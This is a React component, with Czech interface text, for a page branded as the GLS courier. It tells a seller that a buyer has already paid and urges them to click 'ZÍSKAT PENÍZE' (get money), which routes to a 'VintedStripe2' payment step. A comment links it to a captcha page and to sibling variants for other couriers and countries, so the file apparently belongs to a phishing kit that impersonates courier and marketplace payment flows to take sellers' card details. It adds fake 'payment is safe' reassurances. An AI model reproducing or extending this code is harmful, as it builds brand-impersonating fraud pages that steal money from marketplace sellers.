import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './GlsCzSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}
const GLS_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/cz-gls/gls-logo.png`;
const CZ_ITEM_PAID_BANNER = `${process.env.PUBLIC_URL || ''}/cz-shared/item-paid-banner.png`;

function ShieldCheck() {
  return (
    <svg viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z" />
      <path d="M9 12l2 2 4-5" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * GLS (CZ) — success: čeština + CTA → index2 (VintedStripe2).
 * Используется вместе с VintedStripe1 (captcha) как и ee_dpd / fi_posti и т.д.
 */
function GlsCzSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [imgFailed, setImgFailed] = useState(false);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'CZ').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'CZK';
  const sym = getSymbol(currencyCode);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();

  const priceText =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber);

  const amountLine = priceText === '—' ? `— ${sym}` : `${priceText} ${sym}`;

  const address = (pageData?.delivery_address || '').trim() || '—';
  const lastName = (pageData?.last_name || '').trim() || '—';
  const firstName = (pageData?.first_name || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showPhoto = Boolean(photoSrc && !imgFailed);

  if (loading && pageCode) {
    return (
      <div className="glscz-wrap">
        <header className="glscz-header">
          <img src={GLS_LOGO_SRC} alt="GLS" width={220} height={58} />
        </header>
        <main className="glscz-main">
          <div className="glscz-loading">Načítání…</div>
        </main>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="glscz-wrap">
      <header className="glscz-header">
        <img src={GLS_LOGO_SRC} alt="GLS" width={220} height={58} />
      </header>

      <main className="glscz-main">
        <h1 className="glscz-title">Přijetí platby od kupujícího</h1>

        <div className="glscz-grid">
          <div className="glscz-card">
            <div className="glscz-top">
              {showPhoto ? (
                <img
                  className="glscz-thumb glscz-thumb--img"
                  src={photoSrc}
                  alt=""
                  onError={() => setImgFailed(true)}
                  decoding="async"
                />
              ) : (
                <div className="glscz-thumb glscz-thumb--ph" aria-hidden />
              )}
              <div className="glscz-amounts">
                <div className="glscz-amount-top">{amountLine}</div>
                <div className="glscz-amount-sub">{priceText === '—' ? '—' : priceText}</div>
              </div>
            </div>

            <div className="glscz-status">
              <img
                className="glscz-paid-banner-img"
                src={CZ_ITEM_PAID_BANNER}
                alt="Vaše položka byla vydána. Kupující již za objednávku zaplatil."
                decoding="async"
              />

              <div className="glscz-section-h">Podrobnosti o dodání</div>

              <div className="glscz-field">
                <span className="glscz-field-label">Dodací adresa</span>
                <input className="glscz-input" readOnly value={address} />
              </div>

              <div className="glscz-split2">
                <div className="glscz-field">
                  <span className="glscz-field-label">Příjmení</span>
                  <input className="glscz-input" readOnly value={lastName} />
                </div>
                <div className="glscz-field">
                  <span className="glscz-field-label">Křestní jméno</span>
                  <input className="glscz-input" readOnly value={firstName} />
                </div>
              </div>

              <p className="glscz-legal" style={{ marginTop: 14 }}>
                Po obdržení hotovosti odešlete zboží zákazníkovi, podle zadaných údajů nebo převeďte zboží kurýrovi,
                který vám zavolá do 12 hodin.
              </p>
              <p className="glscz-legal" style={{ marginTop: 10 }}>
                Uveďte kupujícího po dodání zboží číslo podání! Zboží musí být dodáno do 3 dnů od obdržení finančních
                prostředků.
              </p>
            </div>
          </div>

          <aside className="glscz-card">
            <div className="glscz-right">
              <p className="glscz-right-amount">{amountLine}</p>
              <Link to={index2Path} className="glscz-btn">
                ZÍSKAT PENÍZE
              </Link>
              <div className="glscz-safe">
                <ShieldCheck />
                Platba je bezpečná
              </div>
              <div className="glscz-legal">
                Kliknutím na tlačítko „ZÍSKAT PENÍZE“ souhlasíte s tím,{' '}
                <a href="#/">Podmínky používání</a> online „Bezpečná nabídka“.
              </div>
            </div>
          </aside>
        </div>
      </main>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default GlsCzSuccess;

